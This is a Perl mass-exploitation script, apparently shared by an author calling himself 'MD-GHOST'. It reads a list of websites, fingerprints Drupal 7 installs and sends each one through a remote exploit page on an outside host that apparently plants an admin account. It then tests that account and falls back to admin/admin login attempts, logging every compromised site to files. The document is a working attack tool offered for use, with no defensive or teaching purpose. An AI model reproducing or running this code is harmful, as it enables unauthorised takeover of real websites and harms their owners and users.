Drupal

1. #usr/bin/perl
2. #coded By MD-GHOST
3. use Term::ANSIColor;
4. use HTTP::Request;
5. use LWP::UserAgent;
6. use IO::Select;
7. use HTTP::Response;
8. use Term::ANSIColor;
9. use HTTP::Request::Common qw(POST);
10. use HTTP::Request::Common qw(GET);
11. use Win32::Console::ANSI;
12.  
13. system ('cls');
14.  
15. $logo =('
16.  
17.  
18. ____  ____  _   _ ____   _    _    
19. |  _ \|  _ \| | | |  _ \ / \  | |    
20. | | | | |_) | | | | |_) / _ \ | |    
21. | |_| |  _ <| |_| |  __/ ___ \| |___
22. |____/|_| \_ ___/ |_| /_/   \_\_____|
23.                                    
24. _______  ______  _     ___ ___ _____ _____ ____  
25. | ____\ \/ /  _ \| |   / _ \_ _|_   _| ____|  _ \
26. |  _|  \  /| |_) | |  | | | | |  | | |  _| | |_) |
27. | |___ /  \|  __/| |__| |_| | |  | | | |___|  _ <
28. |_____/_/\_\_|   |_____\___/___| |_| |_____|_| \_\
29.                                                  
30.          [+] coded By MD-GHOST -_-[+]
31.        [+] Greetz To All My Brothers [+]
32.  
33.  
34.  
35. ');
36. print colored ("$logo",'yellow');
37. open(tarrget,"<$ARGV[0]") or die "WTF where is your list\n";
38. while(<tarrget>){
39. chomp($_);
40. $site = $_;
41. if($site !~ /http:\/\//) { $site = "http://$site/"; };
42. efrez();
43. }
44.  
45. sub efrez($site){
46. $ua = LWP::UserAgent->new(keep_alive => 1);
47. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
48. $ua->timeout (10);
49.  
50. my $efreez = $ua->get("$site")->content;
51. if($efreez =~/\/modules\/system\/system.menus.css|\/sites\/default\/files\/|<meta name=\"Generator\" content=\"Drupal 7/) {
52.    print colored("[DRUPAL] $site",'white on_blue'),"\n\n\n";
53.    fuckdrupal();
54.  
55. open(save, '>>Drupal.txt');
56.    print save "$site\n";  
57.    close(save);
58.    }else{
59.    print "\n[UNKNOWN] $site\n";
60. }
61. }
62.  
63.  
64.  
65. ###################################################################################################################
66. ####################################################################################################################
67. ######################################### DRUPAL  ##################################################################
68. ####################################################################################################################
69.  
70. sub fuckdrupal(){
71.  
72. $ua = LWP::UserAgent->new(keep_alive => 1);
73. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
74. $ua->timeout (20);
75.  
76. # check the link of the exploit or you can download script from here : http://pastebin.com/wPAbtyJ4 and you upload it on you one shell :)
77. $drupalink = "http://www.lasmarionetasdeirene.com/a.php";
78. my $exploit = "$drupalink?url=$site&submit=submit";
79. my $checkk = $ua->get("$exploit")->content;
80. if($checkk =~/Success!/) {
81. print colored ("[DRUPAL EXPLOIT]",'white on_red');
82. print " ............... ";
83. print color('bold white');
84. print "[";
85. print color('reset');
86. print color('bold green');
87. print "VULN";
88. print color('reset');
89. print color('bold white');
90. print "] \n";
91. print color('reset');
92.  
93. print "[WAIT I WILL MAKE SURE ABOUT USER AND PASSWORD]\n";
94. # // here to test the user name and the password if the website has been really fucked or not :p
95. $admin ="mdghost";
96. $pass  ="admin";
97. $wp = $site . '/user/login';
98. $red = $site . '/user/1';
99. print "$wp\n";
100.  
101. $brute = POST $wp, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in', location => $red];
102. $response = $ua->request($brute);
103. $stat = $response->status_line;
104.    if ($stat =~ /302/){
105. print colored ("[BOOM] $site => User | $admin Password | $pass",'white on_green'),"\n";
106.    open(save, '>>fucked by MD-GHOST.txt');
107.    print save "Success MD-GHOST ! $site | username : mdghost | pass: admin\n";
108.    close(save);
109.    }
110.    elsif ($stat =~ /404/){
111.    print "[NOT DRUPAL] .................. [ERROR]\n";
112.    }
113. }else{
114. # // here to test user: admin and password : admin on the panel admin
115. print "[TRYING WITH USER AND PASSWORD ADMIN]\n";
116. $admin="admin";
117. $pass ="admin";
118. $dr = $site . '/user/login';
119. $brute = POST $dr, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in'];
120. $response = $ua->request($brute);
121. $stat = $response->status_line;
122.    if ($stat =~ /302/){
123.  
124. print colored ("[BOOM] $site=> User | $admin Password | $pass",'white on_green'),"\n";
125.  
126.    open(save, '>>fucked.txt');
127.    
128.    print save "Success MD-GHOST ! $site | username : $admin | pass: $pass\n";
129.    
130.    close(save);
131.    }else{
132. print "[DRUPAL] ...................... ";
133. print color('bold white');
134. print "[";
135. print color('reset');
136. print color('bold red');
137. print "ERROR";
138. print color('reset');
139. print color('bold white');
140. print "] \n";
141. print color('reset');
142.  
143.        }
144.    
145. }
146. }